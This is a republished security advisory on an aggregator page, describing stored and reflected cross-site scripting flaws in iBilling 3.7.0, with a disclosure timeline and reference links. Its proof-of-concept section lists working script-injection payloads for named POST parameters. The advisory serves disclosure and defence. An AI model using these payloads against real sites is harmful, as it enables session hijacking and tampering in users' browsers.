Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zeroscienceBikramaditya GuhaZSL-2016-5332
HistoryJun 24, 2016 - 12:00 a.m.

iBilling v3.7.0 Multiple Stored and Reflected Cross-Site Scripting Vulnerabilities

2016-06-2400:00:00
Bikramaditya Guha
zeroscience.mk
32

AI Score

6.3

Confidence

High

JSON

Title: iBilling v3.7.0 Multiple Stored and Reflected Cross-Site Scripting Vulnerabilities
Advisory ID: ZSL-2016-5332
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (3/5)
Release Date: 24.06.2016

Summary

Summary: The features you want, the simplicity you need! Beautifully designed for best User Interface & User Experience. The software That Works For YOUR Business! Get growing - with affordable, scalable business software. Find innovative ways to manage customers data, communicate with customer, know your business cashflow, net worth, send invoice to customer Hassle-free with single click payment reminder, payment confirmations & get paid online integrated with payment gateways.

Description

iBilling suffers from multiple cross-site scripting vulnerabilities. The issue is triggered when input passed via multiple parameters is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context of an affected site.

Vendor

iBilling - <http://www.ibilling.io>

Affected Version

3.7.0

Tested On

nginx
PHP/5.5.9-1ubuntu4.6

Vendor Status

[08.06.2016] Vulnerability discovered.
[08.06.2016] First contact with vendor.
[08.06.2016] Vendor responds asking for details.
[08.06.2016] Vulnerability details sent to the vendor.
[14.06.2016] Follow up with vendor.
[24.06.2016] No response from the vendor.
[24.06.2016] Public security advisory released.

PoC

ibilling_xss.txt

Credits

Vulnerability discovered by Bikramaditya Guha - <[email protected]>

References

[1] <https://www.exploit-db.com/exploits/40022/&gt;
[2] <https://cxsecurity.com/issue/WLB-2016060203&gt;
[3] <https://packetstormsecurity.com/files/137666&gt;
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/114483&gt;
[5] <https://exchange.xforce.ibmcloud.com/vulnerabilities/114486&gt;

Changelog

[24.06.2016] - Initial release
[28.06.2016] - Added reference [1], [2], [3], [4] and [5]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>iBilling v3.7.0 Multiple Stored and Reflected Cross-Site Scripting Vulnerabilities


Vendor: iBilling
Product web page: http://www.ibilling.io
Affected version: 3.7.0

Summary: The features you want, the simplicity you need! Beautifully 
designed for best User Interface &amp; User Experience. The software 
That Works For YOUR Business! Get growing - with affordable, scalable 
business software. Find innovative ways to manage customers data, 
communicate with customer, know your business cashflow, net worth, 
send invoice to customer Hassle-free with single click payment reminder, 
payment confirmations &amp; get paid online integrated with payment gateways.

Desc: iBilling suffers from multiple cross-site scripting vulnerabilities. 
The issue is triggered when input passed via multiple parameters is not 
properly sanitized before being returned to the user. This can be exploited 
to execute arbitrary HTML and script code in a user's browser session in 
context of an affected site.


Tested on: nginx
           PHP/5.5.9-1ubuntu4.6


Vulnerability discovered by Bikramaditya 'PhoenixX' Guha
                            @zeroscience


Advisory ID: ZSL-2016-5332
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5332.php



08.06.2016

--


1. Cross Site Scripting (Stored):

http://localhost/ibilling/index.php
Parameters: msg, desc, account, phone, company, address, city, state, zip, tags, description, ref (POST)

Payload(s):
account=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&amp;company=%22%3E%3Cscript%3Ealert(2)%3C%2Fscript%3E&amp;email=test%40yahoo.com&amp;phone=%22%3E%3Cscript%3Ealert(4)%3C%2Fscript%3E&amp;address=%22%3E%3Cscript%3Ealert(5)%3C%2Fscript%3E&amp;city=%22%3E%3Cscript%3Ealert(6)%3C%2Fscript%3E&amp;state=%22%3E%3Cscript%3Ealert(7)%3C%2Fscript%3E&amp;zip=%22%3E%3Cscript%3Ealert(8)%3C%2Fscript%3E&amp;country=TR&amp;tags%5B%5D=web_development%22%3E%3Cscript%3Ealert(9)%3C%2Fscript%3E

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

2. Cross Site Scripting (Reflected):

http://localhost/ibilling/index.php
Parameters: cid (POST)

Payload(s):
cid=1001"&gt;<script>alert(1)</script>&amp;msg=&amp;icon=

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</p></body></html>

AI Score

6.3

Confidence

High

JSON